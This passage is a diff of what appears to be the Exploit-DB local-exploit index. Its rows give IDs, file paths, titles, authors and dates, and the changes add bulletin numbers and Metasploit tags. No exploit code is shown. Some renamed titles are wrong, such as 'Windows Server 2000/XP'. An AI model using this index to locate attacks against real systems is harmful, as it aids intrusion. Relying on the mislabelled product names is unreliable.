Overflow",1997-06-20,"BeastMaster V",linux,local,0 341,platforms/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Overflows",1997-07-12,"Cristian Schipor",solaris,local,0 -350,platforms/windows/local/350.c,"Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 -351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local,0 -352,platforms/windows/local/352.c,"Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 -353,platforms/windows/local/353.c,"Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0 -355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager All-in-One Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 +350,platforms/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 +351,platforms/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local,0 +352,platforms/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 +353,platforms/windows/local/353.c,"Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0 +355,platforms/windows/local/355.c,"Microsoft Windows Server 2000 - Utility Manager All-in-One Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 367,platforms/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0 @@ -5541,7 +5547,7 @@ id,file,description,date,author,platform,type,port 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0 -1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 +1407,platforms/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0 1415,platforms/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local,0 1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0 @@ -5573,7 +5579,7 @@ id,file,description,date,author,platform,type,port 40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0 1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 -1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 +1911,platforms/windows/local/1911.c,"Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0 1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0 @@ -5844,7 +5850,7 @@ id,file,description,date,author,platform,type,port 6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - (symlink) Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0 -6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)",2008-10-15,"Ruben Santamarta",windows,local,0 +6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0 6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0 6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0 @@ -6400,7 +6406,7 @@ id,file,description,date,author,platform,type,port 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS ASLR + DEP Bypass) (Metasploit)",2010-07-13,Node,windows,local,0 -14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow",2010-07-14,webDEViL,windows,local,0 +14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0 14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 @@ -6584,7 +6590,7 @@ id,file,description,date,author,platform,type,port 15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0 15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 -15985,platforms/windows/local/15985.c,"Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0 +15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0 17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow (Metasploit)",2011-04-25,Metasploit,windows,local,0 @@ -6612,79 +6618,79 @@ id,file,description,date,author,platform,type,port 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0 -16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0 -16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (1)",2010-05-03,Metasploit,windows,local,0 +16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0 +16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 -16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0 +16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0 16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0 -16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (1)",2010-06-15,Metasploit,windows,local,0 -16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (1)",2010-04-30,Metasploit,windows,local,0 -16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0 -16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,local,0 +16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local,0 +16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0 +16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0 +16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,windows,local,0 16617,platforms/windows/local/16617.rb,"VUPlayer - '.m3u' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 -16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH)",2011-01-08,Metasploit,windows,local,0 +16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2011-01-08,Metasploit,windows,local,0 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0 -16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,Metasploit,windows,local,0 -16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use-After-Free (2)",2010-09-25,Metasploit,windows,local,0 -16624,platforms/windows/local/16624.rb,"Adobe - 'util.printf()' Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16625,platforms/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record (Metasploit)",2010-09-25,Metasploit,windows,local,0 +16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16624,platforms/windows/local/16624.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16625,platforms/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)",2010-09-25,Metasploit,windows,local,0 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,windows,local,0 16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0 -16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0 +16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0 16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0 16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 -16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (2)",2010-11-11,Metasploit,windows,local,0 +16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (Metasploit) (2)",2010-11-11,Metasploit,windows,local,0 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 -16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2)",2010-09-25,Metasploit,windows,local,0 +16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 -16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0 16654,platforms/windows/local/16654.rb,"Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,windows,local,0 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - '.psh' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer - Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0 16658,platforms/windows/local/16658.rb,"VUPlayer - '.cue' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,aix,local,0 -16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (Metasploit)",2011-02-08,Metasploit,windows,local,0 +16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)",2011-02-08,Metasploit,windows,local,0 16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 -16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 +16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)",2010-09-25,Metasploit,windows,local,0 16666,platforms/windows/local/16666.rb,"UltraISO - '.CCD' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution (Metasploit)",2010-11-01,Metasploit,windows,local,0 -16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow (2)",2010-11-14,Metasploit,windows,local,0 +16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow (Metasploit) (2)",2010-11-14,Metasploit,windows,local,0 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16670,platforms/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16671,platforms/windows/local/16671.rb,"Adobe PDF - Embedded EXE Social Engineering (Metasploit)",2010-12-16,Metasploit,windows,local,0 -16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption (2)",2010-09-25,Metasploit,windows,local,0 +16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe - Collab.collectEmailInfo() Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0 -16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (2)",2011-01-08,Metasploit,windows,local,0 +16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16678,platforms/windows/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 -16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0 -16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (4)",2010-09-25,Metasploit,windows,local,0 +16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0 +16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 -16686,platforms/windows/local/16686.rb,"Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,Metasploit,windows,local,0 -16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,Metasploit,windows,local,0 +16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0 +16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0 16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 @@ -6715,7 +6721,7 @@ id,file,description,date,author,platform,type,port 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1 < 1.4.4 - SEH Overflow",2011-04-18,sickness,windows,local,0 -17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0 +17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1)",2011-04-19,Metasploit,windows,local,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow",2011-04-27,"Brandon Murphy",windows,local,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow (Metasploit)",2011-04-28,Metasploit,windows,local,0 @@ -6737,7 +6743,7 @@ id,file,description,date,author,platform,type,port 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",windows,local,0 -17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)",2011-06-26,Metasploit,windows,local,0 +17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0 @@ -6748,7 +6754,7 @@ id,file,description,date,author,platform,type,port 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,windows,local,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 -40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0 +40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 @@ -6796,20 +6802,20 @@ id,file,description,date,author,platform,type,port 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,windows,local,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow (Metasploit)",2011-10-26,Metasploit,windows,local,0 18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader - Privilege Escalation (1)",2011-11-02,zx2c4,linux,local,0 -18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite",2011-11-02,Abysssec,windows,local,0 +18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,windows,local,0 18071,platforms/linux/local/18071.sh,"Calibre E-Book Reader - Privilege Escalation (2)",2011-11-03,zx2c4,linux,local,0 18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader - Race Condition Privilege Escalation",2011-11-03,zx2c4,linux,local,0 18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 -18082,platforms/windows/local/18082.rb,"Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0 